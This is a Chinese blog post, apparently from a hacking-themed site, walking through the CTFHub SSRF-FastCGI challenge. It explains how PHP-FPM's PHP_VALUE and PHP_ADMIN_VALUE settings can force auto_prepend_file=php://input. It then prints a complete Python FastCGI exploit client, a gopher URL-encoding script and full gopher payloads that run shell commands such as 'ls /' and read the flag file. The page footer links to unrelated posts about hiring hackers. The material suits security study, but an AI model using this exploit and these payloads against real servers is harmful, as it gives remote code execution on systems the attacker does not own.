当前位置:首页 > 黑客技术 > 正文内容

利用SSRF攻击内网FastCGI协议

访客4年前 (2021-04-15)黑客技术823

利用SSRF攻击内网FastCGI协议

0x01 FastCGI协议

这里我们还是以CTFHub中的技能树为例,进入CTFHub选择技能树,选择Web-SSRF-FastCGI协议就可以进入环境了。

这里开启环境后题目附件给了我们一篇文章,可以让我们来参考。

文章链接:https://blog.csdn.net/mysteryflower/article/details/94386461

什么是FastCGI

Fastcgi就是一个通信协议,相比HTTP协议,HTTP是浏览器与服务器中间件进行数据交换的协议,而FastCGI就是服务器中间件与某个语言后端进行数据交换的协议。

它与HTTP协议一样也有自己特定的格式,这里需要注意的是数据包中也有header和body一说。关于其他具体的格式个人感觉也不用了解的太具体,因为数据包中有很多不可见的字符,就算我们完全了解了也不太可能去手打payload。所以这里就不多介绍了,如果有兴趣可以去文章中具体了解。

什么是PHP-FPM

官方对它的解释是FPM(FastCGI 进程管理器)用于替换 PHP FastCGI 的大部分附加功能,对于高负载网站是非常有用的。

也就是说php-fpm是FastCGI的一个具体实现,并且提供了进程管理的功能,在其中的进程中,包含了master和worker进程,这个在后面我们进行环境搭建的时候可以通过命令查看。其中master 进程负责与 Web 服务器进行通信,接收 HTTP 请求,再将请求转发给 worker 进程进行处理,worker 进程主要负责动态执行 PHP 代码,处理完成后,将处理结果返回给 Web 服务器,再由 Web 服务器将结果发送给客户端。

简单来说FPM就是一个FastCGI的解析器,服务器中间件将用户的请求按照FastCGI的规则打包后就是传给了FPM,然后按照用户的请求解析对应的文件。

借用文章中的例子,用户访问http://127.0.0.1/index.php?a=1&b=2,如果web目录是/var/www/html,那么Nginx会将这个请求变成如下key-value对:

{ 'GATEWAY_INTERFACE': 'FastCGI/1.0', 'REQUEST_METHOD': 'GET', 'SCRIPT_FILENAME': '/var/www/html/index.php', 'SCRIPT_NAME': '/index.php', 'QUERY_STRING': '?a=1&b=2', 'REQUEST_URI': '/index.php?a=1&b=2', 'DOCUMENT_ROOT': '/var/www/html', 'SERVER_SOFTWARE': 'php/fcgiclient', 'REMOTE_ADDR': '127.0.0.1', 'REMOTE_PORT': '12345', 'SERVER_ADDR': '127.0.0.1', 'SERVER_PORT': '80', 'SERVER_NAME': "localhost", 'SERVER_PROTOCOL': 'HTTP/1.1' }

具体的这几个概念之间的关系,可以看下面的图来帮助大家理解。

攻击原理

至于攻击的原理那么就很简单了,PHP-FPM默认监听的端口是9000,一般情况会只会接受127.0.0.1也就是本地的请求。但是如果配置不当让这个端口暴露在公网之中,我们就可以按照FastCGI的规则,自己构造数据包与FPM通信。当然如果没有配置错误我们就需要通过SSRF来利用服务器做跳板来攻击了。

这里就就牵扯到了FPM接收数据包中的一个值了:SCRIPT_FILENAME,这个值指向的就是要执行的文件,只要我们自己构造这个值,就可以执行任意PHP文件。

在FPM某个版本前我们可以指定任意后缀的文件,比如:/etc/passwd。但后来,fpm的默认配置中增加了一个选项 security.limit_extensions ,其限定了只有某些后缀的文件允许被fpm执行,默认是.php。所以,当我们再传入/etc/passwd的时候,将会返回 Access denied. 。所以我们只能执行服务器上现有的PHP文件。

任意代码执行

那么我们要如何才能执行任意代码呢?

这里又涉及到了PHP的配置项,auto_prepend_file和auto_append_file,这两个配置项我在之前的关于文件上传的文章中,.user.ini文件也提到了这两个配置项。这里就再回顾一下这两个配置项的作用。

auto_append_file #在执行php文件后自动包含一个指定文件 auto_prepend_file #在执行php文件前自动包含一个指定文件

那么,我们设置 auto_prepend_file 为 php://input ,(需要注意同样也要配置远程文件包含选项 allow_url_include )那么就等于在执行任何php文件前都要包含一遍POST的内容。那么我们只要将要执行的代码放在body中,就可以执行任意的代码了。

那么我们要怎么设置我们想要配置的值呢,这又涉及到发给PHP-FPM数据包中的另两个值,PHP_VALUE 和 PHP_ADMIN_VALUE 。这两个环境变量就是用来设置PHP配置项的,PHP_VALUE 可以设置模式为 PHP_INI_USER 和 PHP_INI_ALL 的选项,PHP_ADMIN_VALUE 可以设置所有选项。

所以我们配置 PHP_VALUE 为 auto_prepend_file=php://input , PHP_ADMIN_VALUE 为 allow_url_include=On 然后将我们需要执行的代码放在Body中,即可执行任意代码。

0x02 搭建本地环境

由于CTFHub中的环境开启后只有30分钟,而且每次开启环境或者续期环境都需要花费对金币,对于不富裕的小伙伴可能比较有心理负担,可以考虑在本地搭建环境方便自己试验,理解原理后在直接在CTFHub中试验结果。同样搭建环境的过程也能够帮助了解PFM的配置方式,以及未授权访问PFM的原理。

所以如果想要自己搭建环境可以参考这篇文章,文章中讲的很详细,我在这里就不再介绍了。

文章链接:https://bbs.ichunqiu.com/thread-58455-1-1.html

0x03 CTFHub-SSRF-FastCGI实践

上面已经了解了攻击的原理,那么剩下的就很简单了,直接利用exp攻击就可以了。

题目中给的参考文章里的exp链接打不开了,这里就借用另一篇文章中的exp了。

文章链接:https://blog.csdn.net/rfrder/article/details/108589988

import socket import random import argparse import sys from io import BytesIO # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client PY2=True if sys.version_info.major==2 else False def bchr(i): if PY2: return force_bytes(chr(i)) else: return bytes([i]) def bord(c): if isinstance(c, int): return c else: return ord(c) def force_bytes(s): if isinstance(s, bytes): return s else: return s.encode('utf-8', 'strict') def force_text(s): if issubclass(type(s), str): return s if isinstance(s, bytes): s=str(s, 'utf-8', 'strict') else: s=str(s) return s class FastCGIClient: """A Fast-CGI Client for Python""" # private __FCGI_VERSION=1 __FCGI_ROLE_RESPONDER=1 __FCGI_ROLE_AUTHORIZER=2 __FCGI_ROLE_FILTER=3 __FCGI_TYPE_BEGIN=1 __FCGI_TYPE_ABORT=2 __FCGI_TYPE_END=3 __FCGI_TYPE_PARAMS=4 __FCGI_TYPE_STDIN=5 __FCGI_TYPE_STDOUT=6 __FCGI_TYPE_STDERR=7 __FCGI_TYPE_DATA=8 __FCGI_TYPE_GETVALUES=9 __FCGI_TYPE_GETVALUES_RESULT=10 __FCGI_TYPE_UNKOWNTYPE=11 __FCGI_HEADER_SIZE=8 # request state FCGI_STATE_SEND=1 FCGI_STATE_ERROR=2 FCGI_STATE_SUCCESS=3 def __init__(self, host, port, timeout, keepalive): self.host=host self.port=port self.timeout=timeout if keepalive: self.keepalive=1 else: self.keepalive=0 self.sock=None self.requests=dict() def __connect(self): self.sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # if self.keepalive: # self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1) # else: # self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0) try: self.sock.connect((self.host, int(self.port))) except socket.error as msg: self.sock.close() self.sock=None print(repr(msg)) return False return True def __encodeFastCGIRecord(self, fcgi_type, content, requestid): length=len(content) buf=bchr(FastCGIClient.__FCGI_VERSION) \ + bchr(fcgi_type) \ + bchr((requestid >> 8) & 0xFF) \ + bchr(requestid & 0xFF) \ + bchr((length >> 8) & 0xFF) \ + bchr(length & 0xFF) \ + bchr(0) \ + bchr(0) \ + content return buf def __encodeNameValueParams(self, name, value): nLen=len(name) vLen=len(value) record=b'' if nLen < 128: record +=bchr(nLen) else: record +=bchr((nLen >> 24) | 0x80) \ + bchr((nLen >> 16) & 0xFF) \ + bchr((nLen >> 8) & 0xFF) \ + bchr(nLen & 0xFF) if vLen < 128: record +=bchr(vLen) else: record +=bchr((vLen >> 24) | 0x80) \ + bchr((vLen >> 16) & 0xFF) \ + bchr((vLen >> 8) & 0xFF) \ + bchr(vLen & 0xFF) return record + name + value def __decodeFastCGIHeader(self, stream): header=dict() header['version']=bord(stream[0]) header['type']=bord(stream[1]) header['requestId']=(bord(stream[2]) << 8) + bord(stream[3]) header['contentLength']=(bord(stream[4]) << 8) + bord(stream[5]) header['paddingLength']=bord(stream[6]) header['reserved']=bord(stream[7]) return header def __decodeFastCGIRecord(self, buffer): header=buffer.read(int(self.__FCGI_HEADER_SIZE)) if not header: return False else: record=self.__decodeFastCGIHeader(header) record['content']=b'' if 'contentLength' in record.keys(): contentLength=int(record['contentLength']) record['content'] +=buffer.read(contentLength) if 'paddingLength' in record.keys(): skiped=buffer.read(int(record['paddingLength'])) return record def request(self, nameValuePairs={}, post=''): if not self.__connect(): print('connect failure! please check your fasctcgi-server !!') return requestId=random.randint(1, (1 << 16) - 1) self.requests[requestId]=dict() request=b"" beginFCGIRecordContent=bchr(0) \ + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \ + bchr(self.keepalive) \ + bchr(0) * 5 request +=self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN, beginFCGIRecordContent, requestId) paramsRecord=b'' if nameValuePairs: for (name, value) in nameValuePairs.items(): name=force_bytes(name) value=force_bytes(value) paramsRecord +=self.__encodeNameValueParams(name, value) if paramsRecord: request +=self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId) request +=self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId) if post: request +=self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId) request +=self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId) self.sock.send(request) self.requests[requestId]['state']=FastCGIClient.FCGI_STATE_SEND self.requests[requestId]['response']=b'' return self.__waitForResponse(requestId) def __waitForResponse(self, requestId): data=b'' while True: buf=self.sock.recv(512) if not len(buf): break data +=buf data=BytesIO(data) while True: response=self.__decodeFastCGIRecord(data) if not response: break if response['type']==FastCGIClient.__FCGI_TYPE_STDOUT \ or response['type']==FastCGIClient.__FCGI_TYPE_STDERR: if response['type']==FastCGIClient.__FCGI_TYPE_STDERR: self.requests['state']=FastCGIClient.FCGI_STATE_ERROR if requestId==int(response['requestId']): self.requests[requestId]['response'] +=response['content'] if response['type']==FastCGIClient.FCGI_STATE_SUCCESS: self.requests[requestId] return self.requests[requestId]['response'] def __repr__(self): return "fastcgi connect host:{} port:{}".format(self.host, self.port) if __name__=='__main__': parser=argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.') parser.add_argument('host', help='Target host, such as 127.0.0.1') parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php') parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>') parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int) args=parser.parse_args() client=FastCGIClient(args.host, args.port, 3, 0) params=dict() documentRoot="/" uri=args.file content=args.code params={ 'GATEWAY_INTERFACE': 'FastCGI/1.0', 'REQUEST_METHOD': 'POST', 'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'), 'SCRIPT_NAME': uri, 'QUERY_STRING': '', 'REQUEST_URI': uri, 'DOCUMENT_ROOT': documentRoot, 'SERVER_SOFTWARE': 'php/fcgiclient', 'REMOTE_ADDR': '127.0.0.1', 'REMOTE_PORT': '9985', 'SERVER_ADDR': '127.0.0.1', 'SERVER_PORT': '80', 'SERVER_NAME': "localhost", 'SERVER_PROTOCOL': 'HTTP/1.1', 'CONTENT_TYPE': 'application/text', 'CONTENT_LENGTH': "%d" % len(content), 'PHP_VALUE': 'auto_prepend_file=php://input', 'PHP_ADMIN_VALUE': 'allow_url_include=On' } response=client.request(params, content)

这里我们要先用NC来监听一下端口,并把流量记录在文件中,用来接收我们的攻击流量。

命令:nc -lvvp [端口] > [文件名]

然后运行我们的exp脚本:

命令:python [脚本名] -c [要执行的代码] -p [端口号] [ip] [要执行的php文件]

这里我用的虚拟机监听,所以IP是填写我虚拟机的ip地址,后面要执行的php文件是因为要先执行一个现有的php文件才能再去包含我们要执行的代码。CTFHub环境中我们一开始访问的就是index.php,web目录一般就在 /var/www/html 这个文件夹下。实际环境中应该很好找到现有的php文件,如果实在找不到,也可以尝试以下方法:通常使用源安装php的时候,服务器上也都会附带一些php后缀的文件,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如 /usr/local/lib/php/PEAR.php。

运行完攻击的exp后我们再来看看接收到的攻击流量。流量中有很多不可打印字符,打开可能会乱码,我们可以通过hexdump命令来查看:

这里我们还需要对流量进行url编码,在利用另一个python脚本。

# -*- coding: UTF-8 -*- fromurllib.parseimportquote, unquote, urlencode file=open('1.txt','rb') payload=file.read() payload=quote(payload).replace("%0A","%0A%0D") print("gopher://127.0.0.1:9000/_"+quote(payload))

这个脚本可以直接帮我们将流量进行两次url编码,直接变成我们可以利用的payload。生成的payload如下:

gopher://127.0.0.1:9000/_%2501%2501T%259E%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504T%259E%2501%25DB%2500%2500%2511%250BGATEWAY_INTERFACEFastCGI/1.0%250E%2504REQUEST_METHODPOST%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250B%2517SCRIPT_NAME/var/www/html/index.php%250C%2500QUERY_STRING%250B%2517REQUEST_URI/var/www/html/index.php%250D%2501DOCUMENT_ROOT/%250F%250ESERVER_SOFTWAREphp/fcgiclient%250B%2509REMOTE_ADDR127.0.0.1%250B%2504REMOTE_PORT9985%250B%2509SERVER_ADDR127.0.0.1%250B%2502SERVER_PORT80%250B%2509SERVER_NAMElocalhost%250F%2508SERVER_PROTOCOLHTTP/1.1%250C%2510CONTENT_TYPEapplication/text%250E%2502CONTENT_LENGTH23%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250F%2516PHP_ADMIN_VALUEallow_url_include%2520%253D%2520On%2501%2504T%259E%2500%2500%2500%2500%2501%2505T%259E%2500%2517%2500%2500%253C%253Fphp%2520system%2528%2527ls%2520/%2527%2529%253B%253F%253E%2501%2505T%259E%2500%2500%2500%2500

我们直接将payload放到 ?url=参数后面访问:

我们可以看到虽然页面出现了一定的乱码,但是我们还是可以看到成功执行了命令,并展示出了根目录下的文件,我们可以观察到其中就有 flag_052c3b0c46ee677f6f63b629f7f314a1 这个文件,我们在更改执行的命令在来一遍。

监听端口,然后执行exp,不过这次的命令是:

python Attack.py -c "<?php system('cat /flag_052c3b0c46ee677f6f63b629f7f314a1');?>" -p 9000 192.168.48.129 /var/www/html/index.php

使用脚本进行URL编码,最终payload如下:

gopher://127.0.0.1:9000/_%2501%2501%259AP%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%259AP%2501%25DB%2500%2500%2511%250BGATEWAY_INTERFACEFastCGI/1.0%250E%2504REQUEST_METHODPOST%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250B%2517SCRIPT_NAME/var/www/html/index.php%250C%2500QUERY_STRING%250B%2517REQUEST_URI/var/www/html/index.php%250D%2501DOCUMENT_ROOT/%250F%250ESERVER_SOFTWAREphp/fcgiclient%250B%2509REMOTE_ADDR127.0.0.1%250B%2504REMOTE_PORT9985%250B%2509SERVER_ADDR127.0.0.1%250B%2502SERVER_PORT80%250B%2509SERVER_NAMElocalhost%250F%2508SERVER_PROTOCOLHTTP/1.1%250C%2510CONTENT_TYPEapplication/text%250E%2502CONTENT_LENGTH61%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250F%2516PHP_ADMIN_VALUEallow_url_include%2520%253D%2520On%2501%2504%259AP%2500%2500%2500%2500%2501%2505%259AP%2500%253D%2500%2500%253C%253Fphp%2520system%2528%2527cat%2520/flag_052c3b0c46ee677f6f63b629f7f314a1%2527%2529%253B%253F%253E%2501%2505%259AP%2500%2500%2500%2500

再次访问:

成功拿到flag。


扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/106029.html

分享给朋友:

“利用SSRF攻击内网FastCGI协议” 的相关文章

华流年京东618怎么买便宜

京东618活动已经在火热进行中的哦,各位有买什么东西了吗?很多小伙伴在活动一开始的时候就迫不及待的买了很多东西了,还有些小伙伴还很犹豫不知道买啥,接下来百思特小编就来教教大家2020年京东618怎么便宜吧~ 京东618怎么买便宜 活动时...

今天的汽油单价 - 今日燃油价格最新行情

4点59元调为5点02元,不同批次价格会有差距,经常堵车路况差的情况下,93#汽油7点71元/升、20:29单位:人民币,情况今天零时起。 92号汽油,0 号柴油每升上调0点04元。更别说不同地区了,92号汽油,上调0点37行情元;93号,最高限价,决定从。 92汽油官方价6点柴油价:6点:5点90...

美团暗语「美团暗语2021」

 昨天,很多网友问小编美团暗语最好的方法是什么?有关美团暗语2021最好的方法是哪种?最新美团暗语2020?根据网民透露的审判细节这篇文章主要介绍了美团暗语,包括美团暗语 据大江网2021年10月20日17:01:48的最新消息,微博网友@ 爆料。 平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全...

接单的黑客_可以找黑客黑美团吗

有在网络安全范畴中,猜测网络违法和歹意软件发展趋势好像现已成为了各大网络安全公司的传统了。 为了防止让咱们去阅览上百页的安全陈述,咱们专门整兼并总结了McAfee、Forrester、FiskIQ、卡巴斯基实验室【1、2、3】、WatchGuard、Nuvias、FireEye、CyberArk、F...

黑客了解,中国黑客越南网络apt,黑客网站密码破解工具

6.42 · hxxp[://]offlineearthquake[.]com/file//?id=&n=000 进程三:使命履行及实时数据剖析10.61 2019年6月19日,FireEye Endpoint Security设备上收到了缝隙检测警报。 违规应用程序被辨认为Microso...

宏观经济学价格效应 「经济学传递效应」

饮水机效应,价格效应可分解为替代效应和收入效应。通货膨胀的经济效应主要有两个方面,中提出了著名的“节约悖论,比如买切糕,1元钱买了一块切糕,2,利息和货币通论,微观经济学中的价格效应中的一个问题。 “挤出”效应,政府购买和转移支付对我们经济的影响,加剧了收入分配的不均等化进一步加剧。微观经济学,即不...

评论列表

酒奴方且
2年前 (2022-07-06)

DMIN_VALUE 可以设置所有选项。所以我们配置 PHP_VALUE 为 auto_prepend_file=php://input , PHP_ADMIN_VALUE 为 allow_url_include=On 然后将我们需要执行的代码放在Body中,即可执行任意代

鸠骨离鸢
2年前 (2022-07-06)

sdn.net/mysteryflower/article/details/94386461什么是FastCGIFastcgi就是一个通信协议,相比HTTP协议,HTTP是浏览器与服务器中间件进行数据交换的协议,而FastCGI就是服务器中间件与某个语言后端进行数据交换的协议。它与HTTP

泪灼柚笑
2年前 (2022-07-06)

self, fcgi_type, content, requestid): length=len(content) buf=bchr(FastCGIClient.__FCGI_VERSION) \ + bchr(fcgi_type) \

可难抹忆
2年前 (2022-07-06)

P/1.1%250C%2510CONTENT_TYPEapplication/text%250E%2502CONTENT_LENGTH23%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250F

澄萌寄晴
2年前 (2022-07-06)

'/var/www/html/index.php', 'SCRIPT_NAME': '/index.php', 'QUERY_STRING': '?a=1&b=2', 'REQUEST_URI': '/index.php?a=1&b=2',

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。